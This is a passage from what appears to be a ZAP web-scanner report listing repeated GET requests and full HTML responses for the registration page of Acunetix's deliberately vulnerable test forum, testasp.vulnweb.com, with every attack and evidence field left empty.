align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=55 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=56 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=57 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=58 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=59 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=60 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=61 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> 